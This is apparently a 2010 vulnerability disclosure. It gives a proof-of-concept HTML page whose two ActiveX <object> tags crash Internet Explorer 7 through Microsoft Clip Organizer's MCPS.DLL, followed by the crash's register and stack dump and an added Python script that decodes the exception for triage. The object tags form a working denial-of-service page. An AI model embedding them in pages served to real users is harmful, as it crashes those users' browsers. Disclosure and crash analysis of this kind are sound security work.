`# IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control
#
# Date: 19th July 2010
#
# Author: Dinesh Arora & Beenu Arora
#
#
# Affected / Tested Version of IE : 7.0 / WinXP SP3 / MS Office 2007
#
# contact: [email protected], [email protected]
#
# Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly
#
# Shoutz to : http://www.garage4hackers.com , www.beenuarora.com
POC:
<!--
COM Object - {0009608B-3E4E-4BF4-8C8C-D107F1F7B4CE} MC Euro Lexical Analyzer
*******************************************************************************
COM Object Filename : C:\PROGRA~1\MICROS~2\Office12\MCPS.DLL
Major Version : 12
Minor Version : 0
Build Number : 4518
Revision Number : 1014
Product Version : 12.0.4518.1014
Product Name : Microsoft Clip Organizer
-->
<object id=TestObj classid="CLSID:{0009608B-3E4E-4BF4-8C8C-D107F1F7B4CE}" style="width:100;height:350"></object>
<!--
COM Object - {0051FAAD-74C8-4057-8A85-1CFBF9ABB05C} MC Shared Search Scope
*******************************************************************************
COM Object Filename : C:\PROGRA~1\MICROS~2\Office12\MCPS.DLL
Major Version : 12
Minor Version : 0
Build Number : 4518
Revision Number : 1014
Product Version : 12.0.4518.1014
Product Name : Microsoft Clip Organizer
*******************************************************************************
-->
<object id=TestObj classid="CLSID:{0051FAAD-74C8-4057-8A85-1CFBF9ABB05C}" style="width:100;height:350"></object>
Register:
EAX 02299BC4
ECX 00000000
EDX 00000000
EBX 00000000
ESP 02299BC0
EBP 02299C14
ESI 02299C8C
EDI 00000000
EIP 7C812AFB kernel32.7C812AFB
kernel32!RaiseException+53 in C:\WINDOWS\system32\kernel32.dll from Microsoft Corporation has caused an unknown exception (0xc06d007e) on thread 33
This exception originated from MCPS!DllGetClassObject+6db1.
Function Arg 1 Arg 2 Arg 3 Source
kernel32!RaiseException+53 c06d007e 00000000 00000001
MCPS!DllGetClassObject+6db1 00000000 06029c38 39f34f4c
MCPS!DllGetClassObject+5c6d 39f2a3bc 39f221b4 39f34360
MCPS!DllCanUnloadNow+2b6b 00205cf0 0602a688 06029d64
ole32!CClassCache::CDllPathEntry::DllGetClassObject+2d 00205cf0 0602a688 06029d64
ole32!CClassCache::CDllFnPtrMoniker::BindToObjectNoSwitch+1f 06029d18 0602a688 06029d64
ole32!CClassCache::GetClassObject+38 06029d6c 0602a83c 0602a300
ole32!CServerContextActivator::GetClassObject+f5 77607150 0602a300 0602a83c
ole32!ActivationPropertiesIn::DelegateGetClassObject+f3 0602a300 0602a83c 0602a300
ole32!CApartmentActivator::GetClassObject+4d 77607154 0602a300 0602a83c
ole32!CProcessActivator::GCOCallback+2b 77607154 00000001 00000000
ole32!CProcessActivator::AttemptActivation+2c 7760714c 0602a15c 00000000
ole32!CProcessActivator::ActivateByContext+42 7760714c 0602a15c 00000000
ole32!CProcessActivator::GetClassObject+48 7760714c 0602a300 0602a83c
ole32!ActivationPropertiesIn::DelegateGetClassObject+f3 0602a300 0602a83c 003a0043
ole32!CClientContextActivator::GetClassObject+88 77607114 00000001 0602a83c
ole32!ActivationPropertiesIn::DelegateGetClassObject+f3 0602a300 0602a83c 774eca20
ole32!ICoGetClassObject+334 0602a9dc 00000007 00000000
ole32!CComActivator::DoGetClassObject+93 0602a9dc 00000007 00000000
ole32!CoGetClassObject+1b 0602a9dc 00000007 00000000
urlmon!CoGetClassObjectWrap+33 0602a9dc 00000007 00000000
urlmon!CoGetClassObjectFromURL+2ae 056f8fd0 00000000 00000000
mshtml!CCodeLoad::BindToObject+464 3cf5193c 0602bc00 00000000
mshtml!CCodeLoad::Init+296 0576d538 0602bc00 3cf8d43c
mshtml!COleSite::CreateObject+5a5 0602bc00 05720bf8 05976520
mshtml!CObjectElement::CreateObject+6af 3cee8243 0573a860 00000000
mshtml!CHtmObjectParseCtx::Execute+8 0573a860 00000000 00000000
mshtml!CHtmParse::Execute+43 05720bf8 00000000 0573a860
mshtml!CHtmPost::Broadcast+11 3cedb43d 0577ca50 0573a860
mshtml!CHtmPost::Exec+40a 24a63821 0577ca50 0573a860
mshtml!CHtmPost::Run+13 24a63821 0577ca50 0573a860
mshtml!PostManExecute+dc 0577ca50 24a63821 0573a860
mshtml!PostManResume+9e 0573a860 00000001 0602fdf4
mshtml!CHtmPost::OnDwnChanCallback+10 05952930 0573a860 0602fe28
mshtml!CDwnChan::OnMethodCall+19 05952930 00000000 00000000
mshtml!GlobalWndOnMethodCall+101 0602feb0 3cf513d9 00000000
mshtml!GlobalWndProc+181 005707a2 00000009 00000000
user32!InternalCallWinProc+28 3cf513d9 005707a2 00008002
user32!UserCallWinProcCheckWow+150 00000000 3cf513d9 005707a2
user32!DispatchMessageWorker+306 0602ff64 00000000 0602ffb4
user32!DispatchMessageW+f 0602ff64 053400b8 000001c1
ieframe!CTabWindow::_TabWindowThreadProc+189 056adac8 053400b8 000001c1
kernel32!BaseThreadStart+37 3e25e4fc 056a5cf8 00000000
`
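For triage of the crash report above, the following added example (not part of the original advisory) parses a few lines copied from that report and decodes the exception code 0xc06d007e, which follows the layout the MSVC delay-load helper uses: error severity, facility 0x6D, and a Win32 error in the low word. The function names `decode_exception`, `parse_frames` and `triage` are hypothetical, and the embedded report is a subset of the frames shown on this page.

```python
import re

# Sample input: lines copied from the crash report on this page (subset of frames).
REPORT = r"""
kernel32!RaiseException+53 in C:\WINDOWS\system32\kernel32.dll from Microsoft Corporation has caused an unknown exception (0xc06d007e) on thread 33
kernel32!RaiseException+53 c06d007e 00000000 00000001
MCPS!DllGetClassObject+6db1 00000000 06029c38 39f34f4c
MCPS!DllGetClassObject+5c6d 39f2a3bc 39f221b4 39f34360
MCPS!DllCanUnloadNow+2b6b 00205cf0 0602a688 06029d64
ole32!CClassCache::CDllPathEntry::DllGetClassObject+2d 00205cf0 0602a688 06029d64
mshtml!CObjectElement::CreateObject+6af 3cee8243 0573a860 00000000
"""

FACILITY_VISUALCPP = 0x6D  # facility the MSVC delay-load helper puts in its exception codes
WIN32_ERRORS = {0x7E: "ERROR_MOD_NOT_FOUND", 0x7F: "ERROR_PROC_NOT_FOUND"}
EXC_RE = re.compile(r"exception \((0x[0-9a-fA-F]{8})\)")
FRAME_RE = re.compile(r"^(\w+)!(\S+)\+([0-9a-fA-F]+)((?:\s+[0-9a-fA-F]{8}){3})$")


def decode_exception(code):
    """Split a 32-bit exception code into severity, facility and low word."""
    info = {"severity": code >> 30, "facility": (code >> 16) & 0xFFF,
            "code": code & 0xFFFF, "meaning": None}
    if info["facility"] == FACILITY_VISUALCPP and info["code"] in WIN32_ERRORS:
        info["meaning"] = "delay-load failure: " + WIN32_ERRORS[info["code"]]
    return info


def parse_frames(text):
    """Return stack frames (module, symbol, offset, three args) in report order."""
    frames = []
    for line in text.splitlines():
        m = FRAME_RE.match(line.strip())
        if m:
            frames.append({"module": m.group(1), "symbol": m.group(2),
                           "offset": int(m.group(3), 16), "args": m.group(4).split()})
    return frames


def triage(text):
    """Decode the exception and find the first frame outside the raising module."""
    m = EXC_RE.search(text)
    frames = parse_frames(text)
    exc = decode_exception(int(m.group(1), 16)) if m else None
    origin = next((f for f in frames[1:] if f["module"] != frames[0]["module"]), None)
    # RaiseException's first argument is the exception code; cross-check it.
    consistent = bool(m and frames and int(frames[0]["args"][0], 16) == int(m.group(1), 16))
    return {"exception": exc, "origin": origin, "arg_matches_code": consistent}


if __name__ == "__main__":
    print(triage(REPORT))
```

The decoded value indicates that a DLL which MCPS.DLL loads on demand could not be found while the class object was being created, and that the resulting exception went unhandled, which matches the DoS classification in the title.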